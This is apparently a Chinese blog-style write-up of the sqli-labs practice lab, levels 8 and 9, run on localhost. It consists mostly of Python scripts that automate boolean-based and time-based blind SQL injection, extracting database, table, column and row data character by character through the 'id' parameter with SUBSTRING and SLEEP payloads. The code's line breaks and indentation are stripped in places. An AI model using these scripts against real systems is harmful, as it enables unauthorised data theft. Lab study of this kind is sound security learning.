实验环境：

        sqli-labs，小皮面板搭建，edge浏览器

        apache：2.4.39，MySQL：5.7 PHP：5.39

        Python（pycharm2023）:3

less-8

布尔盲注：

       1.我这里是采用最简单的直接采用一串字符串来查询的

import requestsurl = "http://localhost:8080/Less-8/"
param = "id"def getdatabase(url, param):database = ""chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"for i in range(1, 20):for char in chars:payload = f"{param}=1' AND SUBSTRING((SELECT database()), {i}, 1) = '{char}' -- "response = requests.get(url + "?" + payload)if "You are in..........." in response.text:database += charbreakelse:breakreturn database# 获取表名
def gettable(url, param, database):tables = ""chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"for i in range(1, 20):for char in chars:payload = (f"{param}=1' AND SUBSTRING((SELECT GROUP_CONCAT(table_name) "f"FROM information_schema.tables "f"WHERE table_schema = '{database}'), {i}, 1) = '{char}' -- ")response = requests.get(url + "?" + payload)if "You are in..........." in response.text:tables += charbreakelse:breakreturn tables.split(',')# 获取列名
def getcolumn(url, param, database, table):columns = ""chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"for i in range(1, 20):for char in chars:payload = (f"{param}=1' AND SUBSTRING((SELECT GROUP_CONCAT(column_name) "f"FROM information_schema.columns WHERE table_schema = '{database}' "f"AND table_name = '{table}'), {i}, 1) = '{char}' -- ")response = requests.get(url + "?" + payload)if "You are in..........." in response.text:columns += charbreakelse:breakreturn columns.split(',')# 获取结果
def getresult(url, param, database, table, column):result = ""chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"for i in range(1, 20):for char in chars:payload = (f"{param}=1' AND SUBSTRING((SELECT {column} "f"FROM {database}.{table} LIMIT 1), {i}, 1) = '{char}' -- ")response = requests.get(url + "?" + payload)if "You are in..........." in response.text:result += charbreakelse:breakreturn resultif __name__ == "__main__":database = getdatabase(url, param)print(f"Database: {database}")tables = gettable(url, param, database)print(f"Tables: {tables}")table = tables[0]columns = getcolumn(url, param, database, table)print(f"Columns: {columns}")column = columns[0]result = getresult(url, param, database, table, column)print(f"Result: {result}")

tips：我这里没有考虑有多个表和字段的情况，只是简单的把布尔盲注的原理展示了出来、

时间盲注

less-9

时间盲注:

        采用时间函数，判断每个字段是否有时间差值（sleep函数）

import requests
import timedef time_based_blind_injection(url, param, payload):start_time = time.time()full_url = f"{url}?{param}={payload}"response = requests.get(full_url)end_time = time.time()if end_time - start_time > 5:return Truereturn Falsedef get_database(url, param):database = ""chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"for i in range(1, 20):for char in chars:payload = f"1' AND IF(SUBSTRING((SELECT database()), {i}, 1) = '{char}', SLEEP(7), 0) -- "if time_based_blind_injection(url, param, payload):database += charprint(char)breakelse:breakprint(f"[+] Database name: {database}")return database# 获取表名
def get_table(url, param, database):table = ""chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"for i in range(1, 20):for char in chars:payload = (f"1' AND IF(SUBSTRING((SELECT table_name FROM information_schema.tables "f"WHERE table_schema='{database}' LIMIT 0,1), {i}, 1) = '{char}', SLEEP(5), 0) -- ")if time_based_blind_injection(url, param, payload):table += charprint(f"[+] Found character: {char}")breakelse:breakprint(f"[+] Table name: {table}")return table
# def get_tables(url, param, database):当表不止一个
#     tables = []
#     chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
#     table_count = 1  # 从第一个表开始
#     while True:
#         table_name = ""
#         for i in range(1, 20):
#             for char in chars:
#                 payload = (f"1' AND IF(SUBSTRING((SELECT table_name FROM information_schema.tables "
#                            f"WHERE table_schema='{database}' LIMIT {table_count - 1},1), {i}, 1) = '{char}', SLEEP(5), 0) -- ")
#                 if time_based_blind_injection(url, param, payload):
#                     table_name += char
#                     print(f"[+] table: {char}")
#                     break
#             else:
#                 break
#         if table_name:
#             print(f"[+] Found table: {table_name}")
#             tables.append(table_name)
#             table_count += 1
#         else:
#             break
#
#     return tables# 获取字段名
def get_column(url, param, table):column = ""chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"for i in range(1, 20):for char in chars:payload = f"1' AND IF(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name='{table}' LIMIT 0,1), {i}, 1) = '{char}', SLEEP(5), 0) -- "if time_based_blind_injection(url, param, payload):column += charprint(f"[+] column: {char}")breakelse:breakprint(f"[+] Column name: {column}")return columndef get_data(url, param, table, column):data = ""chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"for i in range(1, 20):for char in chars:payload = f"1' AND IF(SUBSTRING((SELECT {column} FROM {table} LIMIT 0,1), {i}, 1) = '{char}', SLEEP(5), 0) -- "if time_based_blind_injection(url, param, payload):data += charprint(f"[+] Found character: {char}")breakelse:breakprint(f"[+] Data: {data}")return data# 主函数
if __name__ == "__main__":target_url = "http://localhost:8080/Less-9/"param = "id"database = get_database(target_url, param)if database:table = get_table(target_url, param, database)if table:column = get_column(target_url, param, table)if column:get_data(target_url, param, table, column)

同样没有考虑不止一个表或者列的情况